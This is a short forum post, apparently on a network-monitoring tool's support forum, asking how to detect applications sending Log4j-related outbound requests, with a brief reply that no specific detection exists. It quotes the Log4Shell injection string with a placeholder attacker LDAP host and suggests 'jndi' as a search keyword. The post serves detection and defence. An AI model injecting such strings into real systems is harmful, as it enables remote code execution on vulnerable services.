Log4j | Find Applications Making Outbound HTTP Requests

Question for you guys regarding the Log4j zero-day.

Can I use glasswire to find applications running log4j on my personal network?

From what I understand you should be able to query based on the HTTP request that is traveling outbound:
${jndi:ldap://[attacker site]/a}

Some hackers are aware of this, and have been modifying the outbound queries, but the surefire string to search on would be “jndi”. Please help me use this tool to identify log4j requests from the various applications that I use on my computer. I want to make sure that I am reasonably covering my bases here.

More info on Log4J if you’re new to the convo:




We have not set up something to specifically detect this issue. Thanks for your feedback on detecting log4j attacks.